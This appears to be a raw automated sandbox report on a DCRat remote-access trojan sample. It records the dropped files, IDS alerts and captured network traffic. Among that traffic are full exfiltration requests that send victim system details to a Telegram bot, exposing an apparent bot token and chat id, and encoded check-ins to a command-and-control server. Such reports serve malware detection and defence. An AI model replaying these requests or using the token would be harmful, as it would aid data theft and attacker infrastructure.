              Source: 6uPVRnocVS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\ProgramData\ssh\System.exeDirectory created: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeJump to behavior
              Source: C:\ProgramData\ssh\System.exeDirectory created: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\bc31d5a79a9161Jump to behavior
              Source: C:\ProgramData\ssh\System.exeDirectory created: C:\Program Files\Windows Defender\lmXqPxTfNHomnnafzTOKZnFns.exeJump to behavior
              Source: C:\ProgramData\ssh\System.exeDirectory created: C:\Program Files\Windows Defender\bc31d5a79a9161Jump to behavior
              Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:53639 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:53641 version: TLS 1.2
              Source: 6uPVRnocVS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 6uPVRnocVS.exe
              Source: Binary string: kC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: eC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: gC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: mC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_000FA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_000FA5F4
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0010B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0010B8E0
              Source: C:\ProgramData\ssh\System.exeFile opened: C:\Users\userJump to behavior
              Source: C:\ProgramData\ssh\System.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
              Source: C:\ProgramData\ssh\System.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\ProgramData\ssh\System.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
              Source: C:\ProgramData\ssh\System.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\ProgramData\ssh\System.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
              Source: C:\Recovery\Idle.exeCode function: 4x nop then dec eax30_2_00007FFD9BD71C91

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:51288 -> 5.101.152.15:80
              Source: Network trafficSuricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 5.101.152.15:80 -> 192.168.2.4:53647
              Source: Network trafficSuricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 5.101.152.15:80 -> 192.168.2.4:53928
              Source: Network trafficSuricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 5.101.152.15:80 -> 192.168.2.4:53943
              Source: Network trafficSuricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.4:53641 -> 149.154.167.220:443
              Uses the Telegram API (likely for C&C communication)
              Source: unknownDNS query: name: api.telegram.org
              Source: global trafficTCP traffic: 192.168.2.4:53634 -> 1.1.1.1:53
              Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7170051875:AAE6pL_pl17E85H-TlJS2rKEh_uqVfRc8Gk/sendPhoto?chat_id=5922069347&caption=%E2%9D%95%20Pipavsya%20%E2%9D%95%0A%E2%80%A2%20ID%3A%202068c5dd94a8a9c670748c61bdf89871812759c4%0A%E2%80%A2%20Comment%3A%20%0A%0A%E2%80%A2%20User%20Name%3A%20user%0A%E2%80%A2%20PC%20Name%3A%20035347%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%208.46.123.189%0A%E2%80%A2%20GEO%3A%20US%20%2F%20New%20York%20City%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CRecovery%5CIdle.exe HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3253052978f8Host: api.telegram.orgContent-Length: 696321Expect: 100-continueConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
              Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
              Source: Joe Sandbox ViewASN Name: BEGET-ASRU BEGET-ASRU
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: ipinfo.io
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?md25=UA&vb=r948xSj667Ud7PLnWmgd&60bc32dfe02b37c4e360dca40128d82d=989faea0cce1115f683b114ca580d3df&9d38ba4b7300523a983f9d7476ad101b=QYlZ2YlVWOiVTYjF2N3MjNjFDNyMjYwEDZ3I2YmdjZzUmNidjY5ETZ&md25=UA&vb=r948xSj667Ud7PLnWmgd HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nIkJWYmZWM1cTNkRzMhVzMiVWY0MzYwITOjFjNyUGO1kjZwgjMkhTYxIiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nIklzY3IWN4IDNlVWO4MWO4MzY2YWMhdTO4YGN5czMwQGMwUDOjZ2YxIiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIzMDNhdTO3MmYxIjMmJDOwIDO0MWO3YmZwE2YxQjZzETMjhDO3YmYhJiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&12c459a86df5a98a63f3de23b4087211=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMlWVtRGcSNTWCpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJhkTwQFRKpWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpNGROpXV610dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIjNWYmZmYkJmMzYDMxUDM1QWO2E2MmVWOxgjYjlTZjNDNiZGO3UjN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&c9ac4e72985eee3d90507dfb878ca2be=QX9JSUNJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3IDNiR2NlZDZxQGZ3QDM2YzMyEmM1UjN0YDOjlTM4ITYyQmMlljZxIiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryJp3V6slVJ7hXe8d3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: monrul3t.beget.techContent-Length: 86203Expect: 100-continue
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWajRkT20keNZTUE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt5